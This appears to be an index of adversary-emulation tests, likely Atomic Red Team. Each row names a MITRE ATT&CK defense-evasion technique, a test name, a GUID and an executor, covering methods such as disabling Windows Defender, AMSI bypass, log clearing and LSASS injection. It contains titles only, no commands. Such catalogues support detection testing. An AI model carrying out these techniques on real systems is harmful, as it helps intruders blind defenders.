80 defense-evasion T1202 Indirect Command Execution 3 Indirect Command Execution - conhost.exe cf3391e0-b482-4b02-87fc-ca8362269b29 command_prompt
81 defense-evasion T1140 Deobfuscate/Decode Files or Information 1 Deobfuscate/Decode Files Or Information dc6fe391-69e6-4506-bd06-ea5eeb4082f8 command_prompt
82 defense-evasion T1140 Deobfuscate/Decode Files or Information 2 Certutil Rename and Decode 71abc534-3c05-4d0c-80f7-cbe93cb2aa94 command_prompt
83 defense-evasion T1562 Impair Defenses 1 Windows Disable LSA Protection 40075d5f-3a70-4c66-9125-f72bee87247d command_prompt
84 defense-evasion T1055.003 Thread Execution Hijacking 1 Thread Execution Hijacking 578025d5-faa9-4f6d-8390-aae527d503e1 powershell
85 defense-evasion T1036 Masquerading 1 System File Copied to Unusual Location 51005ac7-52e2-45e0-bdab-d17c6d4916cd powershell
86 defense-evasion T1036 Masquerading 2 Malware Masquerading and Execution from Zip File 4449c89b-ec82-43a4-89c1-91e2f1abeecc powershell
87 defense-evasion T1070.008 Email Collection: Mailbox Manipulation 1 Copy and Delete Mailbox Data on Windows d29f01ea-ac72-4efc-8a15-bea64b77fabf powershell
88 defense-evasion T1070.008 Email Collection: Mailbox Manipulation 4 Copy and Modify Mailbox Data on Windows edddff85-fee0-499d-9501-7d4d2892e79b powershell
89 defense-evasion T1055 Process Injection 1 Shellcode execution via VBA 1c91e740-1729-4329-b779-feba6e71d048 powershell
90 defense-evasion T1055 Process Injection 2 Remote Process Injection in LSASS via mimikatz 3203ad24-168e-4bec-be36-f79b13ef8a83 command_prompt
91 defense-evasion T1055 Process Injection 3 Section View Injection c6952f41-6cf0-450a-b352-2ca8dae7c178 powershell
92 defense-evasion T1218 Signed Binary Proxy Execution 1 mavinject - Inject DLL into running process c426dacf-575d-4937-8611-a148a86a5e61 command_prompt
93 defense-evasion T1218 Signed Binary Proxy Execution 2 Register-CimProvider - Execute evil dll ad2c17ed-f626-4061-b21e-b9804a6f3655 command_prompt
94 defense-evasion T1218 Signed Binary Proxy Execution 3 InfDefaultInstall.exe .inf Execution 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef command_prompt
95 defense-evasion T1218 Signed Binary Proxy Execution 4 ProtocolHandler.exe Downloaded a Suspicious File db020456-125b-4c8b-a4a7-487df8afb5a2 command_prompt
96 defense-evasion T1218 Signed Binary Proxy Execution 5 Microsoft.Workflow.Compiler.exe Payload Execution 7cbb0f26-a4c1-4f77-b180-a009aa05637e powershell
97 defense-evasion T1218 Signed Binary Proxy Execution 6 Renamed Microsoft.Workflow.Compiler.exe Payload Executions 4cc40fd7-87b8-4b16-b2d7-57534b86b911 powershell
98 defense-evasion T1218 Signed Binary Proxy Execution 7 Invoke-ATHRemoteFXvGPUDisablementCommand base test 9ebe7901-7edf-45c0-b5c7-8366300919db powershell
99 defense-evasion T1218 Signed Binary Proxy Execution 8 DiskShadow Command Execution 0e1483ba-8f0c-425d-b8c6-42736e058eaa powershell
100 defense-evasion T1218 Signed Binary Proxy Execution 9 Load Arbitrary DLL via Wuauclt (Windows Update Client) 49fbd548-49e9-4bb7-94a6-3769613912b8 command_prompt
101 defense-evasion T1218 Signed Binary Proxy Execution 10 Lolbin Gpscript logon option 5bcda9cd-8e85-48fa-861d-b5a85d91d48c command_prompt
102 defense-evasion T1218 Signed Binary Proxy Execution 11 Lolbin Gpscript startup option f8da74bb-21b8-4af9-8d84-f2c8e4a220e3 command_prompt
103 defense-evasion T1218 Signed Binary Proxy Execution 12 Lolbas ie4uinit.exe use as proxy 13c0804e-615e-43ad-b223-2dfbacd0b0b3 command_prompt
104 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 5 Windows - Modify file creation timestamp with PowerShell b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c powershell
105 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 6 Windows - Modify file last modified timestamp with PowerShell f8f6634d-93e1-4238-8510-f8a90a20dcf2 powershell
106 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 7 Windows - Modify file last access timestamp with PowerShell da627f63-b9bd-4431-b6f8-c5b44d061a62 powershell
107 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 8 Windows - Timestomp a File d7512c33-3a75-4806-9893-69abc3ccdd43 powershell
108 defense-evasion T1620 Reflective Code Loading 1 WinPwn - Reflectively load Mimik@tz into memory 56b9589c-9170-4682-8c3d-33b86ecb5119 powershell
109 defense-evasion T1218.003 Signed Binary Proxy Execution: CMSTP 1 CMSTP Executing Remote Scriptlet 34e63321-9683-496b-bbc1-7566bc55e624 command_prompt
110 defense-evasion T1218.003 Signed Binary Proxy Execution: CMSTP 2 CMSTP Executing UAC Bypass 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0 command_prompt
111 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 1 Disable Windows IIS HTTP Logging 69435dcf-c66f-4ec0-a8b1-82beb76b34db powershell
112 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 2 Disable Windows IIS HTTP Logging via PowerShell a957fb0f-1e85-49b2-a211-413366784b1e powershell
113 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 3 Kill Event Log Service Threads 41ac52ba-5d5e-40c0-b267-573ed90489bd powershell
114 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 4 Impair Windows Audit Log Policy 5102a3a7-e2d7-4129-9e45-f483f2e0eea8 command_prompt
115 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 5 Clear Windows Audit Policy Config 913c0e4e-4b37-4b78-ad0b-90e7b25010f6 command_prompt
116 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 6 Disable Event Logging with wevtutil b26a3340-dad7-4360-9176-706269c74103 command_prompt
117 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 7 Makes Eventlog blind with Phant0m 3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741 command_prompt
118 defense-evasion T1218.002 Signed Binary Proxy Execution: Control Panel 1 Control Panel Items 037e9d8a-9e46-4255-8b33-2ae3b545ca6f command_prompt
119 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 1 Disable Microsoft Defender Firewall 88d05800-a5e4-407e-9b53-ece4174f197f command_prompt
120 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 2 Disable Microsoft Defender Firewall via Registry afedc8c4-038c-4d82-b3e5-623a95f8a612 command_prompt
121 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 3 Allow SMB and RDP on Microsoft Defender Firewall d9841bf8-f161-4c73-81e9-fd773a5ff8c1 command_prompt
122 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 4 Opening ports for proxy - HARDRAIN 15e57006-79dd-46df-9bf9-31bc24fb5a80 command_prompt
123 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 5 Open a local port through Windows Firewall to any profile 9636dd6e-7599-40d2-8eee-ac16434f35ed powershell
124 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 6 Allow Executable Through Firewall Located in Non-Standard Location 6f5822d2-d38d-4f48-9bfc-916607ff6b8c powershell
125 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 18 LockBit Black - Unusual Windows firewall registry modification -cmd a4651931-ebbb-4cde-9363-ddf3d66214cb command_prompt
126 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 19 LockBit Black - Unusual Windows firewall registry modification -Powershell 80b453d1-eec5-4144-bf08-613a6c3ffe12 powershell
127 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 20 Blackbit - Disable Windows Firewall using netsh firewall 91f348e6-3760-4997-a93b-2ceee7f254ee command_prompt
128 defense-evasion T1207 Rogue Domain Controller 1 DCShadow (Active Directory) 0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6 powershell
129 defense-evasion T1112 Modify Registry 1 Modify Registry of Current User Profile - cmd 1324796b-d0f6-455a-b4ae-21ffee6aa6b9 command_prompt
130 defense-evasion T1112 Modify Registry 2 Modify Registry of Local Machine - cmd 282f929a-6bc5-42b8-bd93-960c3ba35afe command_prompt
131 defense-evasion T1112 Modify Registry 3 Modify registry to store logon credentials c0413fb5-33e2-40b7-9b6f-60b29f4a7a18 command_prompt
132 defense-evasion T1112 Modify Registry 4 Add domain to Trusted sites Zone cf447677-5a4e-4937-a82c-e47d254afd57 powershell
133 defense-evasion T1112 Modify Registry 5 Javascript in registry 15f44ea9-4571-4837-be9e-802431a7bfae powershell
134 defense-evasion T1112 Modify Registry 6 Change Powershell Execution Policy to Bypass f3a6cceb-06c9-48e5-8df8-8867a6814245 powershell
135 defense-evasion T1112 Modify Registry 7 BlackByte Ransomware Registry Changes - CMD 4f4e2f9f-6209-4fcf-9b15-3b7455706f5b command_prompt
136 defense-evasion T1112 Modify Registry 8 BlackByte Ransomware Registry Changes - Powershell 0b79c06f-c788-44a2-8630-d69051f1123d powershell
137 defense-evasion T1112 Modify Registry 9 Disable Windows Registry Tool ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8 command_prompt
138 defense-evasion T1112 Modify Registry 10 Disable Windows CMD application d2561a6d-72bd-408c-b150-13efe1801c2a powershell
139 defense-evasion T1112 Modify Registry 11 Disable Windows Task Manager application af254e70-dd0e-4de6-9afe-a994d9ea8b62 command_prompt
140 defense-evasion T1112 Modify Registry 12 Disable Windows Notification Center c0d6d67f-1f63-42cc-95c0-5fd6b20082ad command_prompt
141 defense-evasion T1112 Modify Registry 13 Disable Windows Shutdown Button 6e0d1131-2d7e-4905-8ca5-d6172f05d03d command_prompt
142 defense-evasion T1112 Modify Registry 14 Disable Windows LogOff Button e246578a-c24d-46a7-9237-0213ff86fb0c command_prompt
143 defense-evasion T1112 Modify Registry 15 Disable Windows Change Password Feature d4a6da40-618f-454d-9a9e-26af552aaeb0 command_prompt
144 defense-evasion T1112 Modify Registry 16 Disable Windows Lock Workstation Feature 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56 command_prompt
145 defense-evasion T1112 Modify Registry 17 Activate Windows NoDesktop Group Policy Feature 93386d41-525c-4a1b-8235-134a628dee17 command_prompt
146 defense-evasion T1112 Modify Registry 18 Activate Windows NoRun Group Policy Feature d49ff3cc-8168-4123-b5b3-f057d9abbd55 command_prompt
147 defense-evasion T1112 Modify Registry 19 Activate Windows NoFind Group Policy Feature ffbb407e-7f1d-4c95-b22e-548169db1fbd command_prompt
148 defense-evasion T1112 Modify Registry 20 Activate Windows NoControlPanel Group Policy Feature a450e469-ba54-4de1-9deb-9023a6111690 command_prompt
149 defense-evasion T1112 Modify Registry 21 Activate Windows NoFileMenu Group Policy Feature 5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4 command_prompt
150 defense-evasion T1112 Modify Registry 22 Activate Windows NoClose Group Policy Feature 12f50e15-dbc6-478b-a801-a746e8ba1723 command_prompt
151 defense-evasion T1112 Modify Registry 23 Activate Windows NoSetTaskbar Group Policy Feature d29b7faf-7355-4036-9ed3-719bd17951ed command_prompt
152 defense-evasion T1112 Modify Registry 24 Activate Windows NoTrayContextMenu Group Policy Feature 4d72d4b1-fa7b-4374-b423-0fe326da49d2 command_prompt
153 defense-evasion T1112 Modify Registry 25 Activate Windows NoPropertiesMyDocuments Group Policy Feature 20fc9daa-bd48-4325-9aff-81b967a84b1d command_prompt
154 defense-evasion T1112 Modify Registry 26 Hide Windows Clock Group Policy Feature 8023db1e-ad06-4966-934b-b6a0ae52689e command_prompt
155 defense-evasion T1112 Modify Registry 27 Windows HideSCAHealth Group Policy Feature a4637291-40b1-4a96-8c82-b28f1d73e54e command_prompt
156 defense-evasion T1112 Modify Registry 28 Windows HideSCANetwork Group Policy Feature 3e757ce7-eca0-411a-9583-1c33b8508d52 command_prompt
157 defense-evasion T1112 Modify Registry 29 Windows HideSCAPower Group Policy Feature 8d85a5d8-702f-436f-bc78-fcd9119496fc command_prompt
158 defense-evasion T1112 Modify Registry 30 Windows HideSCAVolume Group Policy Feature 7f037590-b4c6-4f13-b3cc-e424c5ab8ade command_prompt
159 defense-evasion T1112 Modify Registry 31 Windows Modify Show Compress Color And Info Tip Registry 795d3248-0394-4d4d-8e86-4e8df2a2693f command_prompt
160 defense-evasion T1112 Modify Registry 32 Windows Powershell Logging Disabled 95b25212-91a7-42ff-9613-124aca6845a8 command_prompt
161 defense-evasion T1112 Modify Registry 33 Windows Add Registry Value to Load Service in Safe Mode without Network 1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5 command_prompt
162 defense-evasion T1112 Modify Registry 34 Windows Add Registry Value to Load Service in Safe Mode with Network c173c948-65e5-499c-afbe-433722ed5bd4 command_prompt
163 defense-evasion T1112 Modify Registry 35 Disable Windows Toast Notifications 003f466a-6010-4b15-803a-cbb478a314d7 command_prompt
164 defense-evasion T1112 Modify Registry 36 Disable Windows Security Center Notifications 45914594-8df6-4ea9-b3cc-7eb9321a807e command_prompt
165 defense-evasion T1112 Modify Registry 37 Suppress Win Defender Notifications c30dada3-7777-4590-b970-dc890b8cf113 command_prompt
166 defense-evasion T1112 Modify Registry 38 Allow RDP Remote Assistance Feature 86677d0e-0b5e-4a2b-b302-454175f9aa9e command_prompt
167 defense-evasion T1112 Modify Registry 39 NetWire RAT Registry Key Creation 65704cd4-6e36-4b90-b6c1-dc29a82c8e56 command_prompt
168 defense-evasion T1112 Modify Registry 40 Ursnif Malware Registry Key Creation c375558d-7c25-45e9-bd64-7b23a97c1db0 command_prompt
169 defense-evasion T1112 Modify Registry 41 Terminal Server Client Connection History Cleared 3448824b-3c35-4a9e-a8f5-f887f68bea21 command_prompt
170 defense-evasion T1112 Modify Registry 42 Disable Windows Error Reporting Settings d2c9e41e-cd86-473d-980d-b6403562e3e1 command_prompt
171 defense-evasion T1112 Modify Registry 43 DisallowRun Execution Of Certain Applications 71db768a-5a9c-4047-b5e7-59e01f188e84 command_prompt
172 defense-evasion T1112 Modify Registry 44 Enabling Restricted Admin Mode via Command_Prompt fe7974e5-5813-477b-a7bd-311d4f535e83 command_prompt
173 defense-evasion T1112 Modify Registry 45 Mimic Ransomware - Enable Multiple User Sessions 39f1f378-ba8a-42b3-96dc-2a6540cfc1e3 command_prompt
174 defense-evasion T1112 Modify Registry 46 Mimic Ransomware - Allow Multiple RDP Sessions per User 35727d9e-7a7f-4d0c-a259-dc3906d6e8b9 command_prompt
175 defense-evasion T1112 Modify Registry 47 Event Viewer Registry Modification - Redirection URL 6174be7f-5153-4afd-92c5-e0c3b7cdb5ae command_prompt
176 defense-evasion T1112 Modify Registry 48 Event Viewer Registry Modification - Redirection Program 81483501-b8a5-4225-8b32-52128e2f69db command_prompt
177 defense-evasion T1112 Modify Registry 49 Enabling Remote Desktop Protocol via Remote Registry e3ad8e83-3089-49ff-817f-e52f8c948090 command_prompt
178 defense-evasion T1112 Modify Registry 50 Disable Win Defender Notification 12e03af7-79f9-4f95-af48-d3f12f28a260 command_prompt
179 defense-evasion T1112 Modify Registry 51 Disable Windows OS Auto Update 01b20ca8-c7a3-4d86-af59-059f15ed5474 command_prompt
180 defense-evasion T1112 Modify Registry 52 Disable Windows Auto Reboot for current logon user 396f997b-c5f8-4a96-bb2c-3c8795cf459d command_prompt
181 defense-evasion T1112 Modify Registry 53 Windows Auto Update Option to Notify before download 335a6b15-b8d2-4a3f-a973-ad69aa2620d7 command_prompt
182 defense-evasion T1112 Modify Registry 54 Do Not Connect To Win Update d1de3767-99c2-4c6c-8c5a-4ba4586474c8 command_prompt
183 defense-evasion T1112 Modify Registry 55 Tamper Win Defender Protection 3b625eaa-c10d-4635-af96-3eae7d2a2f3c command_prompt
184 defense-evasion T1112 Modify Registry 56 Snake Malware Registry Blob 8318ad20-0488-4a64-98f4-72525a012f6b powershell
185 defense-evasion T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking 1 powerShell Persistence via hijacking default modules - Get-Variable.exe 1561de08-0b4b-498e-8261-e922f3494aae powershell
186 defense-evasion T1484.001 Domain Policy Modification: Group Policy Modification 1 LockBit Black - Modify Group policy settings -cmd 9ab80952-74ee-43da-a98c-1e740a985f28 command_prompt
187 defense-evasion T1484.001 Domain Policy Modification: Group Policy Modification 2 LockBit Black - Modify Group policy settings -Powershell b51eae65-5441-4789-b8e8-64783c26c1d1 powershell
188 defense-evasion T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
189 defense-evasion T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
190 defense-evasion T1070.001 Indicator Removal on Host: Clear Windows Event Logs 1 Clear Logs e6abb60e-26b8-41da-8aae-0c35174b0967 command_prompt
191 defense-evasion T1070.001 Indicator Removal on Host: Clear Windows Event Logs 2 Delete System Logs Using Clear-EventLog b13e9306-3351-4b4b-a6e8-477358b0b498 powershell
192 defense-evasion T1070.001 Indicator Removal on Host: Clear Windows Event Logs 3 Clear Event Logs via VBA 1b682d84-f075-4f93-9a89-8a8de19ffd6e powershell
193 defense-evasion T1134.002 Create Process with Token 1 Access Token Manipulation dbf4f5a9-b8e0-46a3-9841-9ad71247239e powershell
194 defense-evasion T1134.002 Create Process with Token 2 WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique ccf4ac39-ec93-42be-9035-90e2f26bcd92 powershell
195 defense-evasion T1218.008 Signed Binary Proxy Execution: Odbcconf 1 Odbcconf.exe - Execute Arbitrary DLL 2430498b-06c0-4b92-a448-8ad263c388e2 command_prompt
196 defense-evasion T1218.008 Signed Binary Proxy Execution: Odbcconf 2 Odbcconf.exe - Load Response File 331ce274-f9c9-440b-9f8c-a1006e1fce0b command_prompt
197 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 3 Disable Powershell ETW Provider - Windows 6f118276-121d-4c09-bb58-a8fb4a72ee84 powershell
198 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 4 Disable .NET Event Tracing for Windows Via Registry (cmd) 8a4c33be-a0d3-434a-bee6-315405edbd5b command_prompt
199 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 5 Disable .NET Event Tracing for Windows Via Registry (powershell) 19c07a45-452d-4620-90ed-4c34fffbe758 powershell
200 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 6 LockBit Black - Disable the ETW Provider of Windows Defender -cmd f6df0b8e-2c83-44c7-ba5e-0fa4386bec41 command_prompt
201 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 7 LockBit Black - Disable the ETW Provider of Windows Defender -Powershell 69fc085b-5444-4879-8002-b24c8e1a3e02 powershell
202 defense-evasion T1070 Indicator Removal on Host 1 Indicator Removal using FSUtil b4115c7a-0e92-47f0-a61e-17e7218b2435 command_prompt
203 defense-evasion T1550.003 Use Alternate Authentication Material: Pass the Ticket 1 Mimikatz Kerberos Ticket Attack dbf38128-7ba7-4776-bedf-cc2eed432098 command_prompt
204 defense-evasion T1550.003 Use Alternate Authentication Material: Pass the Ticket 2 Rubeus Kerberos Pass The Ticket a2fc4ec5-12c6-4fb4-b661-961f23f359cb powershell
205 defense-evasion T1036.004 Masquerading: Masquerade Task or Service 1 Creating W32Time similar named service using schtasks f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9 command_prompt
206 defense-evasion T1036.004 Masquerading: Masquerade Task or Service 2 Creating W32Time similar named service using sc b721c6ef-472c-4263-a0d9-37f1f4ecff66 command_prompt
207 defense-evasion T1055.004 Process Injection: Asynchronous Procedure Call 1 Process Injection via C# 611b39b7-e243-4c81-87a4-7145a90358b1 command_prompt
208 defense-evasion T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass 1 Mount ISO image 002cca30-4778-4891-878a-aaffcfa502fa powershell
209 defense-evasion T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass 2 Mount an ISO image and run executable from the ISO 42f22b00-0242-4afc-a61b-0da05041f9cc powershell
210 defense-evasion T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass 3 Remove the Zone.Identifier alternate data stream 64b12afc-18b8-4d3f-9eab-7f6cae7c73f9 powershell
211 defense-evasion T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass 4 Execute LNK file from ISO c2587b8d-743d-4985-aa50-c83394eaeb68 powershell
212 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 1 Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject 1483fab9-4f52-4217-a9ce-daa9d7747cae command_prompt
213 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 2 Mshta executes VBScript to execute malicious command 906865c3-e05f-4acc-85c4-fbc185455095 command_prompt
214 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 3 Mshta Executes Remote HTML Application (HTA) c4b97eeb-5249-4455-a607-59f95485cb45 powershell
215 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 4 Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement 007e5672-2088-4853-a562-7490ddc19447 powershell
216 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 5 Invoke HTML Application - Jscript Engine Simulating Double Click 58a193ec-131b-404e-b1ca-b35cf0b18c33 powershell
217 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 6 Invoke HTML Application - Direct download from URI 39ceed55-f653-48ac-bd19-aceceaf525db powershell
218 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 7 Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler e7e3a525-7612-4d68-a5d3-c4649181b8af powershell
219 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 8 Invoke HTML Application - JScript Engine with Inline Protocol Handler d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840 powershell
220 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 9 Invoke HTML Application - Simulate Lateral Movement over UNC Path b8a8bdb2-7eae-490d-8251-d5e0295b2362 powershell
221 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 10 Mshta used to Execute PowerShell 8707a805-2b76-4f32-b1c0-14e558205772 command_prompt
222 defense-evasion T1134.001 Access Token Manipulation: Token Impersonation/Theft 1 Named pipe client impersonation 90db9e27-8e7c-4c04-b602-a45927884966 powershell
223 defense-evasion T1134.001 Access Token Manipulation: Token Impersonation/Theft 2 `SeDebugPrivilege` token duplication 34f0a430-9d04-4d98-bcb5-1989f14719f0 powershell
224 defense-evasion T1134.001 Access Token Manipulation: Token Impersonation/Theft 3 Launch NSudo Executable 7be1bc0f-d8e5-4345-9333-f5f67d742cb9 powershell
225 defense-evasion T1134.001 Access Token Manipulation: Token Impersonation/Theft 4 Bad Potato 9c6d799b-c111-4749-a42f-ec2f8cb51448 powershell
226 defense-evasion T1564.002 Hide Artifacts: Hidden Users 3 Create Hidden User in Registry 173126b7-afe4-45eb-8680-fa9f6400431c command_prompt
227 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 1 Parent PID Spoofing using PowerShell 069258f4-2162-46e9-9a25-c9c6c56150d2 powershell
228 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 2 Parent PID Spoofing - Spawn from Current Process 14920ebd-1d61-491a-85e0-fe98efe37f25 powershell
229 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 3 Parent PID Spoofing - Spawn from Specified Process cbbff285-9051-444a-9d17-c07cd2d230eb powershell
230 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 4 Parent PID Spoofing - Spawn from svchost.exe e9f2b777-3123-430b-805d-5cedc66ab591 powershell
231 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 5 Parent PID Spoofing - Spawn from New Process 2988133e-561c-4e42-a15f-6281e6a9b2db powershell
232 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 1 Compiled HTML Help Local Payload 5cb87818-0d7c-4469-b7ef-9224107aebe8 command_prompt
233 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 2 Compiled HTML Help Remote Payload 0f8af516-9818-4172-922b-42986ef1e81d command_prompt
234 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 3 Invoke CHM with default Shortcut Command Execution 29d6f0d7-be63-4482-8827-ea77126c1ef7 powershell
235 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 4 Invoke CHM with InfoTech Storage Protocol Handler b4094750-5fc7-4e8e-af12-b4e36bf5e7f6 powershell
236 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 5 Invoke CHM Simulate Double click 5decef42-92b8-4a93-9eb2-877ddcb9401a powershell
237 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 6 Invoke CHM with Script Engine and Help Topic 4f83adda-f5ec-406d-b318-9773c9ca92e5 powershell
238 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 7 Invoke CHM Shortcut Command with ITS and Help Topic 15756147-7470-4a83-87fb-bb5662526247 powershell
239 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 8 Decompile Local CHM File 20cb05e0-1fa5-406d-92c1-84da4ba01813 command_prompt
240 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 1 Add Network Share 14c38f32-6509-46d8-ab43-d53e32d2b131 command_prompt
241 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 2 Remove Network Share 09210ad5-1ef2-4077-9ad3-7351e13e9222 command_prompt
242 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 3 Remove Network Share PowerShell 0512d214-9512-4d22-bde7-f37e058259b3 powershell
243 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 4 Disable Administrative Share Creation at Startup 99c657aa-ebeb-4179-a665-69288fdd12b8 command_prompt
244 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 5 Remove Administrative Shares 4299eff5-90f1-4446-b2f3-7f4f5cfd5d62 command_prompt
245 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 10 Unload Sysmon Filter Driver 811b3e76-c41b-430c-ac0d-e2380bfaa164 command_prompt
246 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 11 Uninstall Sysmon a316fb2e-5344-470d-91c1-23e15c374edc command_prompt
247 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 12 AMSI Bypass - AMSI InitFailed 695eed40-e949-40e5-b306-b4031e4154bd powershell
248 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 13 AMSI Bypass - Remove AMSI Provider Reg Key 13f09b91-c953-438e-845b-b585e51cac9b powershell
249 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 14 Disable Arbitrary Security Windows Service a1230893-56ac-4c81-b644-2108e982f8f5 command_prompt
250 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 15 Tamper with Windows Defender ATP PowerShell 6b8df440-51ec-4d53-bf83-899591c9b5d7 powershell
251 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 16 Tamper with Windows Defender Command Prompt aa875ed4-8935-47e2-b2c5-6ec00ab220d2 command_prompt
252 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 17 Tamper with Windows Defender Registry 1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45 powershell
253 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 18 Disable Microsoft Office Security Features 6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7 powershell
254 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 19 Remove Windows Defender Definition Files 3d47daaa-2f56-43e0-94cc-caf5d8d52a68 command_prompt
255 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 20 Stop and Remove Arbitrary Security Windows Service ae753dda-0f15-4af6-a168-b9ba16143143 powershell
256 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 21 Uninstall Crowdstrike Falcon on Windows b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297 powershell
257 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 22 Tamper with Windows Defender Evade Scanning -Folder 0b19f4ee-de90-4059-88cb-63c800c683ed powershell
258 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 23 Tamper with Windows Defender Evade Scanning -Extension 315f4be6-2240-4552-b3e1-d1047f5eecea powershell
259 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 24 Tamper with Windows Defender Evade Scanning -Process a123ce6a-3916-45d6-ba9c-7d4081315c27 powershell
260 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 26 Disable Windows Defender with DISM 871438ac-7d6e-432a-b27d-3e7db69faf58 command_prompt
261 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 27 Disable Defender Using NirSoft AdvancedRun 81ce22fd-9612-4154-918e-8a1f285d214d powershell
262 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 28 Kill antimalware protected processes using Backstab 24a12b91-05a7-4deb-8d7f-035fa98591bc powershell
263 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 29 WinPwn - Kill the event log services for stealth 7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66 powershell
264 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 30 Tamper with Windows Defender ATP using Aliases - PowerShell c531aa6e-9c97-4b29-afee-9b7be6fc8a64 powershell
265 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 31 LockBit Black - Disable Privacy Settings Experience Using Registry -cmd d6d22332-d07d-498f-aea0-6139ecb7850e command_prompt
266 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 32 LockBit Black - Use Registry Editor to turn on automatic logon -cmd 9719d0e1-4fe0-4b2e-9a72-7ad3ee8ddc70 command_prompt
